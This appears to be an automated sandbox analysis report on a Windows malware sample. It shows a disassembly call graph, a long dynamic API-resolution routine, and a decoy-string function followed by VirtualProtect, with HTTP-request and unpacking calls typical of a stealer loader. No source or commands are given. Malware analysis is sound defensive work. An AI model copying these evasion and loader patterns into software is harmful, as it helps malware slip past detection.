47020->47021 47061 4157cc 47021->47061 47022 41ab30 lstrlenA lstrcpy 47022->47061 47023 41aa50 lstrcpy 47023->47061 47024 41aab0 lstrcpy 47024->47061 47025 41abb0 lstrcpy 47025->47061 47026 415893 StrCmpCA 47026->47061 47027 4158f0 StrCmpCA 47028 415a2c 47027->47028 47027->47061 47029 41abb0 lstrcpy 47028->47029 47030 415a38 47029->47030 47031 41ab30 2 API calls 47030->47031 47032 415a46 47031->47032 47035 41ab30 2 API calls 47032->47035 47033 415aa6 StrCmpCA 47036 415be1 47033->47036 47033->47061 47034 415440 23 API calls 47034->47061 47037 415a55 47035->47037 47038 41abb0 lstrcpy 47036->47038 47039 4016b0 lstrcpy 47037->47039 47040 415bed 47038->47040 47060 415a61 47039->47060 47041 41ab30 2 API calls 47040->47041 47042 415bfb 47041->47042 47045 41ab30 2 API calls 47042->47045 47043 415c5b StrCmpCA 47046 415c66 Sleep 47043->47046 47047 415c78 47043->47047 47044 415510 29 API calls 47044->47061 47048 415c0a 47045->47048 47046->47061 47049 41abb0 lstrcpy 47047->47049 47050 4016b0 lstrcpy 47048->47050 47051 415c84 47049->47051 47050->47060 47052 41ab30 2 API calls 47051->47052 47053 415c93 47052->47053 47054 41ab30 2 API calls 47053->47054 47056 415ca2 47054->47056 47055 4159da StrCmpCA 47055->47061 47057 4016b0 lstrcpy 47056->47057 47057->47060 47058 415b8f StrCmpCA 47058->47061 47059 401590 lstrcpy 47059->47061 47060->46115 47061->47022 47061->47023 47061->47024 47061->47025 47061->47026 47061->47027 47061->47033 47061->47034 47061->47043 47061->47044 47061->47055 47061->47058 47061->47059 47063 4176e3 GetVolumeInformationA 47062->47063 47064 4176dc 47062->47064 47065 417721 47063->47065 47064->47063 47066 41778c GetProcessHeap HeapAlloc 47065->47066 47067 4177a9 47066->47067 47068 4177b8 wsprintfA 47066->47068 47069 41aa50 lstrcpy 47067->47069 47070 41aa50 lstrcpy 47068->47070 47071 415ff7 47069->47071 47070->47071 47071->46136 47073 41aab0 lstrcpy 47072->47073 47074 4048e9 47073->47074 47280 404800 47074->47280 47076 4048f5 47077 41aa50 lstrcpy 47076->47077 47078 404927 47077->47078 47079 41aa50 lstrcpy 47078->47079 47080 404934 47079->47080 47081 41aa50 lstrcpy 47080->47081 47082 404941 47081->47082 47083 41aa50 lstrcpy 47082->47083 47084 40494e 47083->47084 47085 41aa50 lstrcpy 47084->47085 47086 40495b InternetOpenA StrCmpCA 47085->47086 47087 404994 47086->47087 47088 4049a5 47087->47088 47089 404f1b InternetCloseHandle 47087->47089 47293 418cf0 GetSystemTime lstrcpy lstrcpy 47088->47293 47091 404f38 47089->47091 47288 40a210 CryptStringToBinaryA 47091->47288 47092 4049b3 47294 41ac30 lstrcpy lstrcpy lstrcatA 47092->47294 47095 4049c6 47097 41abb0 lstrcpy 47095->47097 47102 4049cf 47097->47102 47098 41ab30 2 API calls 47099 404f55 47098->47099 47101 41acc0 4 API calls 47099->47101 47100 404f77 codecvt 47104 41aab0 lstrcpy 47100->47104 47103 404f6b 47101->47103 47106 41acc0 4 API calls 47102->47106 47105 41abb0 lstrcpy 47103->47105 47117 404fa7 47104->47117 47105->47100 47107 4049f9 47106->47107 47108 41abb0 lstrcpy 47107->47108 47109 404a02 47108->47109 47110 41acc0 4 API calls 47109->47110 47111 404a21 47110->47111 47112 41abb0 lstrcpy 47111->47112 47113 404a2a 47112->47113 47295 41ac30 lstrcpy lstrcpy lstrcatA 47113->47295 47115 404a48 47116 41abb0 lstrcpy 47115->47116 47118 404a51 47116->47118 47117->46139 47119 41acc0 4 API calls 47118->47119 47120 404a70 47119->47120 47121 41abb0 lstrcpy 47120->47121 47122 404a79 47121->47122 47123 41acc0 4 API calls 47122->47123 47124 404a98 47123->47124 47125 41abb0 lstrcpy 47124->47125 47126 404aa1 47125->47126 47127 41acc0 4 API calls 47126->47127 47128 404acd 47127->47128 47296 41ac30 lstrcpy lstrcpy lstrcatA 47128->47296 47130 404ad4 47131 41abb0 lstrcpy 47130->47131 47132 404add 47131->47132 47133 404af3 InternetConnectA 47132->47133 47133->47089 47134 404b23 HttpOpenRequestA 47133->47134 47136 404b78 47134->47136 47137 404f0e InternetCloseHandle 47134->47137 47138 41acc0 4 API calls 47136->47138 47137->47089 47139 404b8c 47138->47139 47140 41abb0 lstrcpy 47139->47140 47141 404b95 47140->47141 47297 41ac30 lstrcpy lstrcpy lstrcatA 47141->47297 47143 404bb3 47144 41abb0 lstrcpy 47143->47144 47145 404bbc 47144->47145 47146 41acc0 4 API calls 47145->47146 47147 404bdb 47146->47147 47148 41abb0 lstrcpy 47147->47148 47149 404be4 47148->47149 47150 41acc0 4 API calls 47149->47150 47151 404c05 47150->47151 47152 41abb0 lstrcpy 47151->47152 47153 404c0e 47152->47153 47154 41acc0 4 API calls 47153->47154 47155 404c2e 47154->47155 47156 41abb0 lstrcpy 47155->47156 47157 404c37 47156->47157 47158 41acc0 4 API calls 47157->47158 47159 404c56 47158->47159 47160 41abb0 lstrcpy 47159->47160 47161 404c5f 47160->47161 47298 41ac30 lstrcpy lstrcpy lstrcatA 47161->47298 47163 404c7d 47164 41abb0 lstrcpy 47163->47164 47165 404c86 47164->47165 47166 41acc0 4 API calls 47165->47166 47167 404ca5 47166->47167 47168 41abb0 lstrcpy 47167->47168 47169 404cae 47168->47169 47170 41acc0 4 API calls 47169->47170 47171 404ccd 47170->47171 47172 41abb0 lstrcpy 47171->47172 47173 404cd6 47172->47173 47299 41ac30 lstrcpy lstrcpy lstrcatA 47173->47299 47175 404cf4 47176 41abb0 lstrcpy 47175->47176 47177 404cfd 47176->47177 47178 41acc0 4 API calls 47177->47178 47179 404d1c 47178->47179 47180 41abb0 lstrcpy 47179->47180 47181 404d25 47180->47181 47182 41acc0 4 API calls 47181->47182 47183 404d46 47182->47183 47184 41abb0 lstrcpy 47183->47184 47185 404d4f 47184->47185 47186 41acc0 4 API calls 47185->47186 47187 404d6f 47186->47187 47188 41abb0 lstrcpy 47187->47188 47189 404d78 47188->47189 47190 41acc0 4 API calls 47189->47190 47191 404d97 47190->47191 47192 41abb0 lstrcpy 47191->47192 47193 404da0 47192->47193 47300 41ac30 lstrcpy lstrcpy lstrcatA 47193->47300 47195 404dbe 47196 41abb0 lstrcpy 47195->47196 47197 404dc7 47196->47197 47198 41aa50 lstrcpy 47197->47198 47199 404de2 47198->47199 47301 41ac30 lstrcpy lstrcpy lstrcatA 47199->47301 47201 404e03 47302 41ac30 lstrcpy lstrcpy lstrcatA 47201->47302 47203 404e0a 47204 41abb0 lstrcpy 47203->47204 47205 404e16 47204->47205 47206 404e37 lstrlenA 47205->47206 47207 404e4a 47206->47207 47208 404e53 lstrlenA 47207->47208 47303 41ade0 47208->47303 47210 404e63 HttpSendRequestA 47211 404e82 InternetReadFile 47210->47211 47212 404eb7 InternetCloseHandle 47211->47212 47217 404eae 47211->47217 47214 41ab10 47212->47214 47214->47137 47215 41acc0 4 API calls 47215->47217 47216 41abb0 lstrcpy 47216->47217 47217->47211 47217->47212 47217->47215 47217->47216 47308 41ade0 47218->47308 47220 411a14 StrCmpCA 47221 411a27 47220->47221 47222 411a1f ExitProcess 47220->47222 47223 411a37 strtok_s 47221->47223 47231 411a44 47223->47231 47224 411c12 47224->46141 47225 411bee strtok_s 47225->47231 47226 411b41 StrCmpCA 47226->47231 47227 411ba1 StrCmpCA 47227->47231 47228 411bc0 StrCmpCA 47228->47231 47229 411b63 StrCmpCA 47229->47231 47230 411b82 StrCmpCA 47230->47231 47231->47224 47231->47225 47231->47226 47231->47227 47231->47228 47231->47229 47231->47230 47232 411aad StrCmpCA 47231->47232 47233 411acf StrCmpCA 47231->47233 47234 411afd StrCmpCA 47231->47234 47235 411b1f StrCmpCA 47231->47235 47236 41ab30 2 API calls 47231->47236 47237 41ab30 lstrlenA lstrcpy 47231->47237 47232->47231 47233->47231 47234->47231 47235->47231 47236->47225 47237->47231 47238->46147 47239->46149 47240->46155 47241->46157 47242->46163 47243->46165 47244->46169 47245->46173 47246->46177 47247->46183 47248->46185 47249->46189 47250->46203 47251->46207 47252->46206 47253->46202 47254->46206 47255->46224 47256->46209 47257->46211 47258->46215 47259->46220 47260->46221 47261->46228 47262->46231 47263->46237 47264->46259 47265->46264 47266->46263 47267->46260 47268->46263 47269->46273 47272 41aab0 lstrcpy 47271->47272 47273 4016c3 47272->47273 47274 41aab0 lstrcpy 47273->47274 47275 4016d5 47274->47275 47276 41aab0 lstrcpy 47275->47276 47277 4016e7 47276->47277 47278 41aab0 lstrcpy 47277->47278 47279 4015a3 47278->47279 47279->46999 47304 401030 47280->47304 47284 404888 lstrlenA 47307 41ade0 47284->47307 47286 404898 InternetCrackUrlA 47287 4048b7 47286->47287 47287->47076 47289 40a249 LocalAlloc 47288->47289 47290 404f3e 47288->47290 47289->47290 47291 40a264 CryptStringToBinaryA 47289->47291 47290->47098 47290->47100 47291->47290 47292 40a289 LocalFree 47291->47292 47292->47290 47293->47092 47294->47095 47295->47115 47296->47130 47297->47143 47298->47163 47299->47175 47300->47195 47301->47201 47302->47203 47303->47210 47305 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 47304->47305 47306 41ade0 47305->47306 47306->47284 47307->47286 47308->47220 47309 2c235c7 47310 2c235d1 47309->47310 47313 2c23626 47310->47313 47314 2c23635 47313->47314 47317 2c23dc6 47314->47317 47318 2c23de1 47317->47318 47319 2c23dea CreateToolhelp32Snapshot 47318->47319 47320 2c23e06 Module32First 47318->47320 47319->47318 47319->47320 47321 2c23e15 47320->47321 47322 2c23625 47320->47322 47324 2c23a85 47321->47324 47325 2c23ab0 47324->47325 47326 2c23ac1 VirtualAlloc 47325->47326 47327 2c23af9 47325->47327 47326->47327 47327->47327 47328 484003c 47329 4840049 47328->47329 47343 4840e0f SetErrorMode SetErrorMode 47329->47343 47334 4840265 47335 48402ce VirtualProtect 47334->47335 47337 484030b 47335->47337 47336 4840439 VirtualFree 47341 48405f4 LoadLibraryA 47336->47341 47342 48404be 47336->47342 47337->47336 47338 48404e3 LoadLibraryA 47338->47342 47340 48408c7 47341->47340 47342->47338 47342->47341 47344 4840223 47343->47344 47345 4840d90 47344->47345 47346 4840dad 47345->47346 47347 4840dbb GetPEB 47346->47347 47348 4840238 VirtualAlloc 47346->47348 47347->47348 47348->47334

                                              Executed Functions

                                              Function 00419F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 633 419f20-419f2a 634 419f30-41a341 GetProcAddress * 43 633->634 635 41a346-41a3da LoadLibraryA * 8 633->635 634->635 636 41a456-41a45d 635->636 637 41a3dc-41a451 GetProcAddress * 5 635->637 638 41a463-41a521 GetProcAddress * 8 636->638 639 41a526-41a52d 636->639 637->636 638->639 640 41a5a8-41a5af 639->640 641 41a52f-41a5a3 GetProcAddress * 5 639->641 642 41a5b5-41a642 GetProcAddress * 6 640->642 643 41a647-41a64e 640->643 641->640 642->643 644 41a654-41a72a GetProcAddress * 9 643->644 645 41a72f-41a736 643->645 644->645 646 41a7b2-41a7b9 645->646 647 41a738-41a7ad GetProcAddress * 5 645->647 648 41a7bb-41a7e7 GetProcAddress * 2 646->648 649 41a7ec-41a7f3 646->649 647->646 648->649 650 41a825-41a82c 649->650 651 41a7f5-41a820 GetProcAddress * 2 649->651 652 41a922-41a929 650->652 653 41a832-41a91d GetProcAddress * 10 650->653 651->650 654 41a92b-41a988 GetProcAddress * 4 652->654 655 41a98d-41a994 652->655 653->652 654->655 656 41a996-41a9a9 GetProcAddress 655->656 657 41a9ae-41a9b5 655->657 656->657 658 41a9b7-41aa13 GetProcAddress * 4 657->658 659 41aa18-41aa19 657->659 658->659
                                              APIs
                                              • GetProcAddress.KERNEL32(75900000,02C9C9C0), ref: 00419F3D
                                              • GetProcAddress.KERNEL32(75900000,02C9CA00), ref: 00419F55
                                              • GetProcAddress.KERNEL32(75900000,02C9EA28), ref: 00419F6E
                                              • GetProcAddress.KERNEL32(75900000,02C9EB60), ref: 00419F86
                                              • GetProcAddress.KERNEL32(75900000,02C9EB48), ref: 00419F9E
                                              • GetProcAddress.KERNEL32(75900000,02C9EB78), ref: 00419FB7
                                              • GetProcAddress.KERNEL32(75900000,02CA0BA0), ref: 00419FCF
                                              • GetProcAddress.KERNEL32(75900000,02C9EB90), ref: 00419FE7
                                              • GetProcAddress.KERNEL32(75900000,02C9EBA8), ref: 0041A000
                                              • GetProcAddress.KERNEL32(75900000,02C9EB18), ref: 0041A018
                                              • GetProcAddress.KERNEL32(75900000,02C9EB00), ref: 0041A030
                                              • GetProcAddress.KERNEL32(75900000,02C9CC40), ref: 0041A049
                                              • GetProcAddress.KERNEL32(75900000,02C9CC60), ref: 0041A061
                                              • GetProcAddress.KERNEL32(75900000,02C9CAE0), ref: 0041A079
                                              • GetProcAddress.KERNEL32(75900000,02C9CCA0), ref: 0041A092
                                              • GetProcAddress.KERNEL32(75900000,02C9EB30), ref: 0041A0AA
                                              • GetProcAddress.KERNEL32(75900000,02C9EAE8), ref: 0041A0C2
                                              • GetProcAddress.KERNEL32(75900000,02CA0C68), ref: 0041A0DB
                                              • GetProcAddress.KERNEL32(75900000,02C9CD60), ref: 0041A0F3
                                              • GetProcAddress.KERNEL32(75900000,02CA4FB0), ref: 0041A10B
                                              • GetProcAddress.KERNEL32(75900000,02CA4E78), ref: 0041A124
                                              • GetProcAddress.KERNEL32(75900000,02CA4FC8), ref: 0041A13C
                                              • GetProcAddress.KERNEL32(75900000,02CA4FE0), ref: 0041A154
                                              • GetProcAddress.KERNEL32(75900000,02C9CCC0), ref: 0041A16D
                                              • GetProcAddress.KERNEL32(75900000,02CA4F68), ref: 0041A185
                                              • GetProcAddress.KERNEL32(75900000,02CA5130), ref: 0041A19D
                                              • GetProcAddress.KERNEL32(75900000,02CA50B8), ref: 0041A1B6
                                              • GetProcAddress.KERNEL32(75900000,02CA50E8), ref: 0041A1CE
                                              • GetProcAddress.KERNEL32(75900000,02CA5058), ref: 0041A1E6
                                              • GetProcAddress.KERNEL32(75900000,02CA50D0), ref: 0041A1FF
                                              • GetProcAddress.KERNEL32(75900000,02CA5100), ref: 0041A217
                                              • GetProcAddress.KERNEL32(75900000,02CA5118), ref: 0041A22F
                                              • GetProcAddress.KERNEL32(75900000,02CA4FF8), ref: 0041A248
                                              • GetProcAddress.KERNEL32(75900000,02CA08C8), ref: 0041A260
                                              • GetProcAddress.KERNEL32(75900000,02CA5148), ref: 0041A278
                                              • GetProcAddress.KERNEL32(75900000,02CA4F20), ref: 0041A291
                                              • GetProcAddress.KERNEL32(75900000,02C9CD80), ref: 0041A2A9
                                              • GetProcAddress.KERNEL32(75900000,02CA50A0), ref: 0041A2C1
                                              • GetProcAddress.KERNEL32(75900000,02C9CD20), ref: 0041A2DA
                                              • GetProcAddress.KERNEL32(75900000,02CA4F38), ref: 0041A2F2
                                              • GetProcAddress.KERNEL32(75900000,02CA4E60), ref: 0041A30A
                                              • GetProcAddress.KERNEL32(75900000,02C9CD40), ref: 0041A323
                                              • GetProcAddress.KERNEL32(75900000,02C9D080), ref: 0041A33B
                                              • LoadLibraryA.KERNEL32(02CA4EA8,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A34D
                                              • LoadLibraryA.KERNEL32(02CA4E90,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A35E
                                              • LoadLibraryA.KERNEL32(02CA4EC0,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A370
                                              • LoadLibraryA.KERNEL32(02CA4F50,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A382
                                              • LoadLibraryA.KERNEL32(02CA4F80,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A393
                                              • LoadLibraryA.KERNEL32(02CA4ED8,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3A5
                                              • LoadLibraryA.KERNEL32(02CA4F98,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3B7
                                              • LoadLibraryA.KERNEL32(02CA4EF0,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3C8
                                              • GetProcAddress.KERNEL32(75FD0000,02C9CEA0), ref: 0041A3EA
                                              • GetProcAddress.KERNEL32(75FD0000,02CA4F08), ref: 0041A402
                                              • GetProcAddress.KERNEL32(75FD0000,02C9EEB0), ref: 0041A41A
                                              • GetProcAddress.KERNEL32(75FD0000,02CA5070), ref: 0041A433
                                              • GetProcAddress.KERNEL32(75FD0000,02C9D040), ref: 0041A44B
                                              • GetProcAddress.KERNEL32(734B0000,02CA0EC0), ref: 0041A470
                                              • GetProcAddress.KERNEL32(734B0000,02C9CF20), ref: 0041A489
                                              • GetProcAddress.KERNEL32(734B0000,02CA0D58), ref: 0041A4A1
                                              • GetProcAddress.KERNEL32(734B0000,02CA5010), ref: 0041A4B9
                                              • GetProcAddress.KERNEL32(734B0000,02CA5028), ref: 0041A4D2
                                              • GetProcAddress.KERNEL32(734B0000,02C9CDC0), ref: 0041A4EA
                                              • GetProcAddress.KERNEL32(734B0000,02C9CFE0), ref: 0041A502
                                              • GetProcAddress.KERNEL32(734B0000,02CA5040), ref: 0041A51B
                                              • GetProcAddress.KERNEL32(763B0000,02C9CE40), ref: 0041A53C
                                              • GetProcAddress.KERNEL32(763B0000,02C9CE60), ref: 0041A554
                                              • GetProcAddress.KERNEL32(763B0000,02CA5088), ref: 0041A56D
                                              • GetProcAddress.KERNEL32(763B0000,02CA5178), ref: 0041A585
                                              • GetProcAddress.KERNEL32(763B0000,02C9D0C0), ref: 0041A59D
                                              • GetProcAddress.KERNEL32(750F0000,02CA0DD0), ref: 0041A5C3
                                              • GetProcAddress.KERNEL32(750F0000,02CA0A60), ref: 0041A5DB
                                              • GetProcAddress.KERNEL32(750F0000,02CA51A8), ref: 0041A5F3
                                              • GetProcAddress.KERNEL32(750F0000,02C9D100), ref: 0041A60C
                                              • GetProcAddress.KERNEL32(750F0000,02C9D120), ref: 0041A624
                                              • GetProcAddress.KERNEL32(750F0000,02CA0AD8), ref: 0041A63C
                                              • GetProcAddress.KERNEL32(75A50000,02CA5190), ref: 0041A662
                                              • GetProcAddress.KERNEL32(75A50000,02C9D0E0), ref: 0041A67A
                                              • GetProcAddress.KERNEL32(75A50000,02C9EEC0), ref: 0041A692
                                              • GetProcAddress.KERNEL32(75A50000,02CA51C0), ref: 0041A6AB
                                              • GetProcAddress.KERNEL32(75A50000,02CA5160), ref: 0041A6C3
                                              • GetProcAddress.KERNEL32(75A50000,02C9D0A0), ref: 0041A6DB
                                              • GetProcAddress.KERNEL32(75A50000,02C9CF40), ref: 0041A6F4
                                              • GetProcAddress.KERNEL32(75A50000,02CA51D8), ref: 0041A70C
                                              • GetProcAddress.KERNEL32(75A50000,02CA51F0), ref: 0041A724
                                              • GetProcAddress.KERNEL32(75070000,02C9D000), ref: 0041A746
                                              • GetProcAddress.KERNEL32(75070000,02CA5208), ref: 0041A75E
                                              • GetProcAddress.KERNEL32(75070000,02CA5220), ref: 0041A776
                                              • GetProcAddress.KERNEL32(75070000,02CA5658), ref: 0041A78F
                                              • GetProcAddress.KERNEL32(75070000,02CA5790), ref: 0041A7A7
                                              • GetProcAddress.KERNEL32(74E50000,02C9D140), ref: 0041A7C8
                                              • GetProcAddress.KERNEL32(74E50000,02C9CE00), ref: 0041A7E1
                                              • GetProcAddress.KERNEL32(75320000,02C9CDE0), ref: 0041A802
                                              • GetProcAddress.KERNEL32(75320000,02CA5568), ref: 0041A81A
                                              • GetProcAddress.KERNEL32(6F060000,02C9CEC0), ref: 0041A840
                                              • GetProcAddress.KERNEL32(6F060000,02C9CF00), ref: 0041A858
                                              • GetProcAddress.KERNEL32(6F060000,02C9CDA0), ref: 0041A870
                                              • GetProcAddress.KERNEL32(6F060000,02CA5688), ref: 0041A889
                                              • GetProcAddress.KERNEL32(6F060000,02C9CE80), ref: 0041A8A1
                                              • GetProcAddress.KERNEL32(6F060000,02C9CF60), ref: 0041A8B9
                                              • GetProcAddress.KERNEL32(6F060000,02C9CEE0), ref: 0041A8D2
                                              • GetProcAddress.KERNEL32(6F060000,02C9CFA0), ref: 0041A8EA
                                              • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0041A901
                                              • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0041A917
                                              • GetProcAddress.KERNEL32(74E00000,02CA5778), ref: 0041A939
                                              • GetProcAddress.KERNEL32(74E00000,02C9EF30), ref: 0041A951
                                              • GetProcAddress.KERNEL32(74E00000,02CA5838), ref: 0041A969
                                              • GetProcAddress.KERNEL32(74E00000,02CA56A0), ref: 0041A982
                                              • GetProcAddress.KERNEL32(74DF0000,02C9D060), ref: 0041A9A3
                                              • GetProcAddress.KERNEL32(6FBC0000,02CA5598), ref: 0041A9C4
                                              • GetProcAddress.KERNEL32(6FBC0000,02C9CF80), ref: 0041A9DD
                                              • GetProcAddress.KERNEL32(6FBC0000,02CA55B0), ref: 0041A9F5
                                              • GetProcAddress.KERNEL32(6FBC0000,02CA5748), ref: 0041AA0D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$LibraryLoad
                                              • String ID: HttpQueryInfoA$InternetSetOptionA
                                              • API String ID: 2238633743-1775429166
                                              • Opcode ID: 20b608565022329c8e522603aeb206678cdaef6a3851366fd54475d7f707e8f0
                                              • Instruction ID: fc853244e6edf76f870e234c3061c456cb9d9aaab695e8dd72f65461d71d1d70
                                              • Opcode Fuzzy Hash: 20b608565022329c8e522603aeb206678cdaef6a3851366fd54475d7f707e8f0
                                              • Instruction Fuzzy Hash: 98623EB5D1B2549FC344DFA8FC8895677BBA78D301318A61BF909C3674E734A640CB62
                                              Function 00404610 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114stringmemoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040461C
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404627
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404632
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040463D
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404648
                                              • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,00416C9B), ref: 00404657
                                              • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,00416C9B), ref: 0040465E
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040466C
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404677
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404682
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040468D
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404698
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046AC
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046B7
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046C2
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046CD
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046D8
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404701
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040470C
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404717
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404722
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472D
                                              • strlen.MSVCRT ref: 00404740
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404768
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404773
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040477E
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404789
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404794
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047A4
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047AF
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047BA
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047C5
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047D0
                                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004047EC
                                              Strings
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B2
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
